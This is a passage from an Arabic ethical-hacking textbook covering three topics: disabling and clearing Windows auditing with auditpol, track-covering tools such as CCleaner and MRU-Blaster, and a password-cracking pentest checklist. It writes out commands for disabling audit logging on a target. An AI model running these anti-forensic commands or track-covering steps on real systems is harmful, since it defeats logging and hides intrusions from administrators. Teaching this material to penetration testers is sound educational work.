‫‪ -‬ﺣذف ﻣﻠﻔﺎت اﻟﻛوﻛﯾز ﻋﻧد اﻟﺧروج ‪Clear cookies on exit‬‬
‫‪ -‬ﺗﻔرﯾﻎ ذاﻛرة اﻟﺗﺧزﯾن اﻟﻣؤﻗت ﻋﻧد اﻟﺧروج ‪Clear cache on exit‬‬
‫‪ -‬ﺣذف اﻟﺗﻧزﯾﻼت ‪Delete downloads‬‬
‫‪ -‬ﺗﻌطﯾل ﻣدﯾر ﻛﻠﻣﺔ اﻟﺳر ‪Disable password manager‬‬
‫‪ -‬ﺗﻔرﯾﻎ اﻟﺑﯾﺎﻧﺎت ﻓﻲ إدارة ﻛﻠﻣﺔ اﻟﻣرور ‪Clear data in password manager‬‬
‫‪ -‬ﺣذف اﻟﺟﻠﺳﺎت اﻟﻣﺣﻔوظﺔ ‪Delete saved sessions‬‬
‫‪ -‬ﺣذف ﺟﺎﻓﺎ ﺳﻛرﯾﺑت اﻟﻣﺳﺗﺧدم ‪Delete user JavaScript‬‬
‫‪ -‬اﻧﺷﺎء ﻋدة ﻣﺳﺗﺧدﻣﯾن ‪Set up multiple users‬‬
‫‪ -‬ﺣذف أﻛﺛر اﻷﺷﯾﺎء اﻟﻣﺳﺗﺧدﻣﺔ ﻣؤﺧرا )‪Remove Most Recently Used (MRU‬‬
‫‪ -‬ﺗﻔرﯾﻎ ﺑﯾﺎﻧﺎت ﺷرﯾط اﻷدوات ﻣن اﻟﻣﺗﺻﻔﺣﺎت ‪Clear Toolbar data from the browsers‬‬
‫‪ -‬إﯾﻘﺎف اﻹﻛﻣﺎل اﻟﺗﻠﻘﺎﺋﻲ ‪Turn off Autocomplete‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪482‬‬

‫‪Disabling Auditing: Auditpol‬‬

‫اﻟﻣﺻدر‪http://technet.microsoft.com/en-us :‬‬
‫واﺣدة ﻣن اﻟﺧطوات اﻷوﻟﻰ ﻟﻠﻣﮭﺎﺟم اﻟذي ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧدام ﺳطر اﻷواﻣر )‪(cmd‬ھو ﺗﺣدﯾد ﺣﺎﻟﺔ اﻟﺗدﻗﯾﻖ )‪ (auditing‬ﻟﻠﻧظﺎم اﻟﮭدف‪،‬‬
‫ﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻠﻔﺎت اﻟﺣﺳﺎﺳﺔ )ﻣﺛل ﻣﻠﻔﺎت ﻛﻠﻣﺔ اﻟﺳر(‪ ،‬وزرع أدوات ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﯾﺎ )ﻣﺛل ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ أو اﻟﺗﺟﺳس ﻋﻠﻰ‬
‫اﻟﺷﺑﻛﺔ ]‪.( [network sniffer‬‬
‫‪ Windows auditing‬ﺗﻘوم ﺑﺗﺳﺟﯾل ﺑﻌض اﻷﺣداث إﻟﻰ ﺳﺟل اﻷﺣداث)‪) (event log‬أو ‪ syslog‬اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ(‪ .‬ﯾﻣﻛن ﺗﻌﯾﯾن ﺳﺟل‬
‫ﻹرﺳﺎل ﺗﻧﺑﯾﮭﺎت )اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،pager ،‬وھﻠم ﺟرا( إﻟﻰ ﻣﺳؤول اﻟﻧظﺎم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن اﻟﻣﮭﺎﺟم ﯾرﯾد أن ﯾﻌرف ﺣﺎﻟﺔ ﺗدﻗﯾﻖ اﻟﻧظﺎم‬
‫)‪ (Windows auditing‬اﻟذي ﯾﺣﺎول اﺧﺗراﻗﮫ ﻗﺑل اﻟﺷروع ﻓﻲ ﺗﻧﻔﯾذ ﺧططﮫ‪.‬‬
‫أداة ‪ Auditpol.exe‬ھو ﺟزء ﻣن ﻣﺟﻣوﻋﺔ أدوات ‪ NT resource kit‬واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻛﺄﻧﮭﺎ ﺳطر أواﻣر ﺑﺳﯾط ﻟﻣﻌرﻓﺔ ﺣﺎﻟﺔ ﺗدﻗﯾﻖ‬
‫اﻟﻧظﺎم )‪ (Windows auditing‬اﻟﮭدف وأﯾﺿﺎ إﺟراء ﺗﻐﯾﯾرات ﻋﻠﯾﮫ‪.‬‬
‫ﺳوف اﻟﻣﮭﺎﺟم ﺗﺣﺗﺎج إﻟﻰ ﺗﺛﺑﯾت اﻷداة ﻓﻲ ﻣﺳﺎر ‪ .WINNT‬وﻣن ھﻧﺎ ﯾﻣﻛﻧﮫ ﺗﺄﺳﯾس ﺟﻠﺳﺔ ﻋﻣل ﻓﺎرﻏﺔ )‪ (Null Session‬إﻟﻰ اﻟﺟﮭﺎز اﻟﮭدف‬
‫ﺛم ﯾﻘوم ﺑﺗﺷﻐﯾل اﻷﻣر‪:‬‬
‫>‪C:\> auditpol \\<ip address of target‬‬
‫ھذا ﺳوف ﯾﻛﺷف ﺣﺎﻟﺔ اﻟﺗدﻗﯾﻖ)‪ (auditing status‬اﻟﺣﺎﻟﯾﺔ ﻟﻠﻧظﺎم‪ .‬ﺛم اﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر ﺗﻌطﯾل اﻟﺗدﻗﯾﻖ)‪ (auditing‬ﺑواﺳطﺔ‪:‬‬
‫‪C :\> auditpol \\<ip address of target) /disable‬‬
‫ھذا اﻻﺟراء ﺳوف ﯾﻘوم ﺑﺎﻟﻌدﯾد ﻣن اﻟﺗﻐﯾﯾرات ﻓﻲ ﻣﺧﺗﻠف ﻣﻠﻔﺎت اﻟﺳﺟﻼت اﻟﺗﻲ ﺗﺳﺟل أي ﻣن اﻻﻓﻌﺎل‪ .‬اﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر ﻹﺧﻔﺎء ﺗﻐﯾرات‬
‫ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻓﻲ وﻗت ﻻﺣﻖ‪.‬‬
‫ﻟﺣظﺔ ﻛﺳب اﻣﺗﯾﺎزات إدارﯾﺔ ﻣن ﻗﺑل اﻟدﺧﻼء‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن ﺗﻌطﯾل اﻟﺗدﻗﯾﻖ ﺑﻣﺳﺎﻋدة ‪ .auditpol.exe‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﮫ‪ ،‬ﻓﺎﻧﮫ ﺑﻌد‬
‫ﺧروج اﻟدﺧﻼء ﯾﺗم ﺗﻔﻌﯾل اﻟﺗدﻗﯾﻖ ﻣرة أﺧرى ﺑﺎﺳﺗﺧدام ﻧﻔس اﻷداة‪.audit.exe :‬‬
‫ﻣﻦ اﻟﻤﺜﺎل اﻟﺘﺎﻟﻲ ﺳﻮف ﻧﺘﻌﻠﻢ ﻛﯿﻔﯿﺔ اﻋﺪاد ‪Audit policy‬‬

‫ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر ‪ Command Prompt‬ﻛﻣﺳﺗﺧدم اﻟﻣدﯾر )‪.(Administrator‬‬ ‫‪-‬‬


‫ﻟﻣﻌرﻓﺔ ﺟﻣﯾﻊ ‪ Audit policies‬ﯾﻣﻛن ذﻟك ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬ ‫‪-‬‬
‫*‪C:\> auditpol /get/category:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪483‬‬

‫ﻟﺗﻔﻌﯾل أي ﻣن ‪ Audit policies‬ﯾﺗم ذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻻﻣر اﻟﺗﺎﻟﻲ‪:‬‬ ‫‪-‬‬


‫‪C:\> auditpol /set/category:”system”,”account logon” /success:enable /failure:enable‬‬

‫ﻟﺗﻔرﯾﻎ أي ﻣن ‪ Audit policies‬ﯾﺗم ذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻻﻣر ]‪.[auditpol /clear /y‬‬ ‫‪-‬‬

‫‪Covering Tracks Tool: CCleaner‬‬

‫اﻟﻣﺻدر‪http://www.piriform.com :‬‬
‫‪ CCleaner‬ھو أداه ﻟﺗﺣﺳﯾن اﻟﻧظﺎم ‪ ،‬اﻟﺧﺻوﺻﯾﺔ‪ ،‬وأداة ﺗﻧظﯾف‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺈزاﻟﺔ اﻟﻣﻠﻔﺎت اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ وﯾﻧظف آﺛﺎر ﺗﻔﺎﺻﯾل ﺗﺻﻔﺢ‬
‫اﻹﻧﺗرﻧت ﻣن ﺧﻼل ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﺈﻧﮫ ﯾﺣﻔظ ﺧﺻوﺻﯾﺗك ﻋﻠﻰ اﻹﻧﺗرﻧت‪ ،‬وﯾﺟﻌل اﻟﻧظﺎم أﺳرع وأﻛﺛر أﻣﻧﺎ‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾﺣرر‬
‫ﻣﺳﺎﺣﺔ اﻟﻘرص اﻟﺛﺎﺑت ﻻﺳﺗﺧداﻣﮭﺎ ﻣرة أﺧرى‪ .‬ﻣﻊ ھذه اﻷداة‪ ،‬ﯾﻣﻛﻧك ﻣﺣو اﻟﻣﺳﺎرات اﻟﺧﺎﺻﺔ ﺑك ﺑﺳﮭوﻟﺔ ﺟدا‪ .‬ﻛﻣﺎ أﻧﮫ ﯾﻧظف آﺛﺎر اﻷﻧﺷطﺔ‬
‫اﻟﺧﺎﺻﺔ ﺑك ﻋﻠﻰ اﻻﻧﺗرﻧت ﻣﺛل ﺗﺎرﯾﺦ اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪484‬‬

‫‪Covering Tracks Tool: MRU-Blaster‬‬

‫اﻟﻣﺻدر‪http://www.brightfort.com :‬‬
‫‪ MRU-Blaster‬ھو ﺗطﺑﯾﻖ ﯾﺳﻣﺢ ﻟك ﺑﺗﻧظﯾف أﻛﺛر اﻟﻘواﺋم اﻟﻣﺳﺗﺧدﻣﺔ ﻣؤﺧرا ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬وﻣﻠﻔﺎت اﻻﻧﺗرﻧت اﻟﻣؤﻗﺗﺔ‪ ،‬واﻟﻛوﻛﯾز‪ .‬ﻗﺎﺋﻣﺔ‬
‫‪MRU‬ﯾوﻓر ﻟك ﻣﻌﻠوﻣﺎت ﻛﺎﻣﻠﺔ ﻋن أﺳﻣﺎء وﻣواﻗﻊ اﻟﻣﻠﻔﺎت اﻷﺧﯾرة اﻟﺗﻲ وﺻﻠت إﻟﯾﮭﺎ‪ ،‬ﻓﺗﺢ‪ ،‬ﺣﻔظ‪ ،‬واﻟﻧظر ﻓﯾﮭﺎ‪ .‬ﻓﺈﻧﮫ ﯾﺿﻣن ﺧﺻوﺻﯾﺔ‬
‫اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك ‪ MRU-Blaster .‬ﯾﻌﺎﻟﺞ ﺑﺄﻣﺎن ﺗﻧظﯾف "اﻟﻣﺳﺎرات اﻟﻣﺳﺗﺧدﻣﺔ" و ﻏﯾرھﺎ ﻣن اﻟﻣﺧﻠﻔﺎت اﻟﺗﻲ ﺗﺗرﻛﮭﺎ ﻣﻌظم اﻟﺑراﻣﺞ‬
‫وراءھﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪485‬‬

‫‪Track Covering Tools‬‬

‫أدوات ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات )‪ (Track covering tools‬ﯾﺣﻣﻲ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء ﺗﺻﻔﺢ اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك‬
‫ﻋن طرﯾﻖ ﺗﻧظﯾف ﺟﻣﯾﻊ اﻟﻣﺳﺎرات ﻣن أﻧﺷطﺔ اﻹﻧﺗرﻧت ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﺗﻔرغ ذاﻛرة اﻟﺗﺧزﯾن اﻟﻣؤﻗت‪ ،‬ﺣذف ﻣﻠﻔﺎت اﻟﻛوﻛﯾز‪ ،‬ﺗﻔرغ‬
‫‪ Internet history‬اﻟﺗﻲ ﺗﺷﺎرك اﻟﻣﻠﻔﺎت اﻟﻣؤﻗﺗﺔ‪ ،‬ﺣذف ﺳﺟﻼت‪ ،‬وﺗﺟﺎھل اﻟﻐﯾر اﻟﻣرﻏوب ﻓﯾﮫ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ھذه اﻷدوات ﻋﻠﻰ‬
‫اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Wipe available at http://privacyroot.com‬‬
‫‪Tracks Eraser Pro available at http://www.acesoft.net‬‬
‫‪BleachBit available at http://bleachbit.sourceforge.net‬‬
‫‪Absoluteshield Internet Eraser Pro available at http://www.internet-track-eraser.com‬‬
‫‪Clear My History available at http://www.hide-my-ip.com‬‬
‫‪EvidenceEraser available at http://evidence-eraser-pro.en.softonic.com‬‬
‫‪WinTools.net Professional available at http://www.wintools.net‬‬
‫‪RealTime Cookie & Cache Cleaner (RtC3) available at http://www.kleinsoft.co.za‬‬
‫‪AdvaHist Eraser available at http://advahist-eraser.software.informer.com‬‬
‫‪Free Internet Window Washer available at http://www.eusing.com‬‬

‫‪PENETRATION TESTING 5.8‬‬

‫ﻛﻣﺧﺗﺑر اﻻﺧﺗراق‪ ،‬ﯾﺟب ﺗﻘﯾﯾم اﻟوﺿﻊ اﻷﻣﻧﻲ ﻟﻠﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻧظﺎم‪ .‬ﻟﺗﻘﯾﯾم اﻷﻣن‪ ،‬ﯾﺟب أن ﺗﺣﺎول ﻛﺳر أﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋن‬
‫طرﯾﻖ ﻣﺣﺎﻛﺎة ھﺟﻣﺎت ﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﺗﻣﺎﻣﺎ ﻣﺛل ﻣﺎ ﯾﻘوم ﺑﮫ اﻟﻣﮭﺎﺟم‪ .‬ھﻧﺎك ﺑﻌض اﻟﺧطوات اﻟﺗﻲ ﺗﺣﺗﺎج ﻟﻣﺗﺎﺑﻌﺔ إﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق‬
‫اﻟﻧظﺎم‪ .‬وﺳﯾﻛون ھذا اﻟﻘﺳم ﯾﻌﻠﻣك ﻛﯾﻔﯾﺔ إﺟراء ﻧظﺎم اﻟﻘرﺻﻧﺔ ﻛﺎﺧﺗﺑﺎر اﻻﺧﺗراق‪.‬‬

‫‪Password Cracking‬‬

‫ﻓﻲ ﻣﺣﺎوﻟﺔ ﻻﺧﺗراق ﻧظﺎم‪ ،‬اﻟﻣﮭﺎﺟم ﯾﺣﺎول ﻓﻲ اﻟﺑداﯾﺔ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم‪ ،‬إن وﺟدت‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﺑﻣﺛﺎﺑﺔ إﻧك ﻣﺧﺗﺑر اﺧﺗراق‪ ،‬ﯾﺟب ﻋﻠﯾك‬
‫أﯾﺿﺎ ﻣﺣﺎوﻟﺔ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم‪ .‬ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ ،‬اﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :1‬ﺗﺤﺪﯾﺪ ﻧﻈﺎم ﻛﻠﻤﺔ اﻟﺴﺮ اﻟﻤﺤﻤﯿﺔ )‪(Identify password protected systems‬‬
‫اﻟﺗﻌرف ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف اﻟذي ﯾﺣﺗﺎج إﻟﻰ ﺗﻘﯾﯾم أﻣﻧﻰ‪ .‬ﺑﻣﺟرد اﻟﺗﻌرف ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﻟدﯾك ﺣﻖ اﻟوﺻول إﻟﻰ ﻛﻠﻣﺔ اﻟﻣرور‪،‬‬
‫وھذا ﯾﻌﻧﻲ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺧزﻧﺔ‪ .‬إذا ﻟم ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻓﻣﺣﺎول ﺗﻧﻔﯾذ اﻟﻌدﯾد ﻣن اﻟﮭﺟﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻟﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور واﺣدة ﺗﻠو‬
‫اﻷﺧرى ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :2‬ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻘﺎﻣﻮس )‪(Perform a dictionary attack‬‬
‫ﺗﻧﻔﯾذ ھﺟوم اﻟﻘﺎﻣوس ﻋن طرﯾﻖ ﺗﺣﻣﯾل ﻣﻠف اﻟﻘﺎﻣوس إﻟﻰ ﺗطﺑﯾﻖ اﻟﻛﺳﯾر واﻟذي ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﺿد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﺗﺷﻐﯾل ﺗطﺑﯾﻖ اﻟﻛﺳر‬
‫وﻣراﻗﺑﺔ اﻟﻧﺗﺎﺋﺞ‪ .‬إذا ﻛﺎن اﻟﺗطﺑﯾﻖ ﺳﻣﺢ ﻟك ﻟﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم‪ ،‬ﻓﮭذا ﯾﻌﻧﻲ أن ﻣﻠف اﻟﻘﺎﻣوس ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر‪ .‬إذا ﻟم ﺗﻛن ﻗﺎدرا‬
‫ﻋﻠﻰ ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم‪ ،‬ﻓﺣﺎول ﻣرة أﺧرى ﻣﻊ ﺗﻘﻧﯾﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور اﻷﺧرى‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :3‬إﺟﺮاء اﻟﺘﺠﺴﺲ ﻋﻠﻰ أﺳﻼك اﻟﺸﺒﻜﺔ )‪(Perform wire sniffing‬‬
‫ﺗﺷﻐﯾل أدوات اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ ﻟﻠوﺻول وﺗﺳﺟﯾل ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ اﻟﺧﺎم اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺷﻣل ﻛﻠﻣﺎت اﻟﺳر اﻟﻣرﺳﻠﺔ إﻟﻰ‬
‫اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :4‬ﺗﻨﻔﯿﺬ اﻟﮭﺠﻮم اﻟﻘﺎﺋﻢ ﻋﻠﻰ ﻗﻮاﻋﺪ )‪(Perform a rule-based attack‬‬
‫ﻣﺣﺎوﻟﺔ اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ إﺟراء اﻟﮭﺟوم اﻟﻣﺳﺗﻧد إﻟﻰ اﻟﻘﺎﻋدة‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :5‬ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻤﻘﻄﻊ )‪(Perform a syllable attack‬‬
‫ﻣﺣﺎوﻟﺔ اﺳﺗﺧراج ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ إﺟراء ھﺟوم ‪ .syllable‬ھذا اﻟﮭﺟوم ھو ﻣزﯾﺞ ﻣن ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪(brute force attack‬‬
‫وھﺟوم اﻟﻘﺎﻣوس)‪. (dictionary attack‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪486‬‬

‫‪ -‬اﻟﺨﻄﻮة ‪ :6‬ﺗﻨﻔﯿﺬ اﻟﮭﺠﻮم اﻟﮭﺠﯿﻦ )‪(Perform a hybrid attack‬‬


‫ﺣﺎول ﺗﻧﻔﯾذ ھﺟوم اﻟﮭﺟﯾن‪ .‬ﯾﺳﺗﺧدم ھذا اﻟﮭﺟوم ﻟﻠﻌﺛور ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ھﻲ ﻛﻠﻣﺔ اﻟﻘﺎﻣوس ﻣﻊ ﺗرﻛﯾﺑﺎت ﻣن اﻷﺣرف اﻟﻣرﻓﻘﺔ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :7‬ﺗﻨﻔﯿﺬ ھﺠﻮم اﻟﻘﻮة اﻟﻐﺎﺷﻤﺔ )‪(Perform a brute force attack‬‬
‫ﯾﺟب أن ﺗﺣﺎول ﻛل ﺗرﻛﯾﺑﺔ ﻣﻣﻛﻧﺔ ﻣن اﻷﺣرف ﺣﺗﻰ ﯾﺗم اﻟﻌﺛور ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :8‬ﺗﻨﻔﯿﺬ ھﺠﻮم رﺟﻞ ﻓﻲ اﻟﻮﺳﻂ )‪(Perform a man-in-the-middle attack‬‬
‫ﻣﺣﺎوﻟﺔ ﻟﻠﺣﺻول ﻋﻠﻰ اﻟوﺻول إﻟﻰ ﻗﻧوات اﺗﺻﺎل ﺑﯾن اﻟﺿﺣﯾﺔ واﻟﺧﺎدم ﻻﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :9‬ﺗﻨﻔﯿﺬ ﻋﻤﻠﯿﺔ ﺗﺨﻤﯿﻦ ﻛﻠﻤﺔ اﻟﺴﺮ )‪(Perform password guessing‬‬
‫ﻣﺣﺎوﻟﺔ ﻟﺗﺧﻣﯾن ﺗوﻟﯾﻔﺎت ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ وﺗطﺑﯾﻘﮭﺎ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :10‬ﺗﻨﻔﯿﺬ ھﺠﻤﺎت ﺗﺮوﺟﺎن‪/‬اﻟﺘﺠﺴﺲ‪/‬ﻛﯿﻠﻮﺟﺮز )‪(Perform Trojans Spyware/Keyloggers‬‬
‫اﺳﺗﺧدام اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ أو اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل اﻟﺗروﺟﺎن ‪ /‬اﻟﺗﺟﺳس ‪ /‬ﻛﯾﻠوﺟرز ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :11‬ﺗﻨﻔﯿﺬ ھﺠﻮم ﺣﻘﻦ اﻟﮭﺎش )‪(Perform Hash Injection Attack‬‬
‫ﺣﻘن اﻟﮭﺎش اﻟﻣﺧﺗرق ﻓﻲ اﻟﺟﻠﺳﺔ اﻟﻣﺣﻠﯾﺔ واﺳﺗﺧدام اﻟﮭﺎش ﻟﻠﺗﺣﻘﻖ ﻣن ﺻﺣﺔ ﻣوارد اﻟﺷﺑﻛﺔ‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :12‬ﺗﻨﻔﯿﺬ ھﺠﻮم رﻧﺒﻮ )‪(Perform a rainbow attack‬‬
‫اﺳﺗﺧدام ﺟدول ‪rainbow‬اﻟذي ﯾﺧزن اﻟﮭﺎﺷﺎت اﻟﻣﺣﺳوﺑﺔ ﻣﺳﺑﻘﺎ ﻟﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :13‬ﺗﻨﻔﯿﺬ ھﺠﻮم ﺗﻮزﯾﻊ اﻟﺸﺒﻜﺔ )‪(Perform a distributed network attack‬‬
‫اﺳﺗﻌﺎدة ﻛﻠﻣﺔ ﻣرور اﻟﻣﻠﻔﺎت اﻟﻣﺣﻣﯾﺔ ﺑﺎﺳﺗﺧدام ﻗوة اﻟﻣﻌﺎﻟﺞ اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ ﻣن اﻵﻻت ﻋﺑر اﻟﺷﺑﻛﺔ ﻟﻔك ﺗﺷﻔﯾر اﻟﻛﻠﻣﺎت‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :14‬ﺗﻨﻔﯿﺬ اﻟﮭﺎش اﻟﻤﺤﺴﻮﺑﺔ ﻣﺴﺒﻘﺎ )‪(Perform pre-computed hashes‬‬
‫اﺳﺗﺧدام اﻟﮭﺎش اﻟﻣﺣﺳوﺑﺔ ﻣﺳﺑﻘﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :15‬ﺗﻨﻔﯿﺬ اﻟﺘﻨﻘﯿﺐ ﻓﻲ اﻟﻘﻤﺎﻣﺔ )‪(Perform dumpster diving‬‬
‫اﻟﺗﺣﻘﻖ ﻣن ﻗﻣﺎﻣﺔ اﻟﮭدف ﻟﻠﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﯾوﺟد ﻛﻠﻣﺎت اﻟﺳر اﻟﺳرﯾﺔ ﻓﻲ أي ﻣﻛﺎن‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :16‬ﺗﻨﻔﯿﺬ اﻟﮭﻨﺪﺳﺔ اﻻﺟﺘﻤﺎﻋﯿﺔ )‪(Perform social engineering‬‬
‫اﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬اﻟﺨﻄﻮة ‪ :17‬إﺟﺮاء اﻟﺘﺠﺴﺲ )‪(Perform shoulder surfing‬‬
‫ﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ﯾﻣﻛن ﺳرﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺑﺎﺳﺗﺧدام ‪.shoulder surfing‬‬

‫‪Privilege Escalation‬‬

‫ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻛﻠﻣﺎت ﻣرور اﻟﻧظﺎم‪ ،‬ﻓﺎﻧﮫ ﺳوف ﯾﺣﺎول ﺗﺻﻌﯾد اﻣﺗﯾﺎزاﺗﮫ إﻟﻰ ﻣﺳﺗوى اﻟﻣﺳؤول ﺑﺣﯾث ﯾﻣﻛن ﺗﺛﺑﯾت اﻟﺑراﻣﺞ أو‬
‫اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺑﺈﻣﻛﺎﻧﮫ اﺳﺗرﺟﺎع اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻣن اﻟﻧظﺎم‪ .‬ﺑﻣﺛﺎﺑﺔ إﻧك ﻣﺧﺗﺑر اﺧﺗراق‪ ،‬ﯾﺟب ﻋﻠﯾك‬
‫اﺧﺗراق اﻟﻧظﺎم ﻛﻣﺳﺗﺧدم ﻋﺎدي ﺛم ﻣﺣﺎوﻟﺔ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ اﻟﺧطوات ﻟﺗﻧﻔﯾذ ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎز‪:‬‬
